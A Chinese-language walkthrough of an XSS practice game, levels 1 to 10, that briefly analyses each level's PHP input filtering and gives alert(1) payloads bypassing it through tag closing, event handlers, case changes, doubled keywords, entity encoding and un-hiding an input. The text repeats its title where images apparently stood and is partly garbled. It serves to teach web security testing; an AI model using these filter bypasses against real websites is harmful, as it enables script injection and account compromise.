XSS知识朝花夕拾

xssgame(1-10)
简单源码分析

Level1
看看源码,直接将用户输入的内容不加处理的添加到了echo语句中进行“打印”,
Payload:
<script>alert(1)
<img src=”” οnerrοr=alert(“1”)>
还有很多很多
XSS朝花夕拾代码简单分析(XSSgame)

XSS朝花夕拾代码简单分析(XSSgame)Level2
查看源码
XSS朝花夕拾代码简单分析(XSSgame)Payload位置 echo中的<input name=keyword value=”’.str.’”>
使用“>将标签闭合之后出发xss
XSS朝花夕拾代码简单分析(XSSgame)Level3
查看源码,使用了htmlspecialchars()函数对传入的参数进行了处理,但是可以使用单引号,进行绕过,添加一个点击事件
XSS朝花夕拾代码简单分析(XSSgame)XSS朝花夕拾代码简单分析(XSSgame)Payload:
’ οnclick=alert(1)//
’ οnclick=’ window.alert(‘1’)

XSS朝花夕拾代码简单分析(XSSgame)Level4
查看源码,使用str_replace()函数,将<>替换为空
![hXSS朝花夕拾代码简单分析(XSSgame)使用双引号闭合value的值,之后添加onclick事件
XSS朝花夕拾代码简单分析(XSSgame)Level5
查看源码
XSS朝花夕拾代码简单分析(XSSgame)使用了str_replace()函数对输入进行处理
XSS朝花夕拾代码简单分析(XSSgame)使用”>闭合value,再添加<a href=>标签。

Level6
查看源代码
过滤了href、data、<script、on、src
尝试了一下之后发现可以使用大小写绕过
XSS朝花夕拾代码简单分析(XSSgame)Payload:
“><a HREF=”javascript:alert(1)”>

XSS朝花夕拾代码简单分析(XSSgame)Level7
查看源码,将敏感字符替换为空,可以使用双写绕过

XSS朝花夕拾代码简单分析(XSSgame)Payload:
“><a hrhrefef=”javascscriptript:alert(1)”>
XSS朝花夕拾代码简单分析(XSSgame)Level8
查看源码
尝试之后,发现可以使用编码绕过
XSS朝花夕拾代码简单分析(XSSgame)Payload: javas&#99;ript:alert(1)
XSS朝花夕拾代码简单分析(XSSgame)XSS朝花夕拾代码简单分析(XSSgame)Level9
查看源码
XSS朝花夕拾代码简单分析(XSSgame)跟第八题不一样的地方是有对http://做校验
在上一个payload的基础上,加上就行了
XSS朝花夕拾代码简单分析(XSSgame)Level10
查看源码
XSS朝花夕拾代码简单分析(XSSgame)使用了type=”hidden”,隐藏了输入
使用双引号闭合value的双引号,之后添加type=”text”,之后设置一个点击事件
Payload:” type=”text” οnclick=”alert(1)
XSS朝花夕拾代码简单分析(XSSgame)XSS朝花夕拾代码简单分析(XSSgame)

相关文章: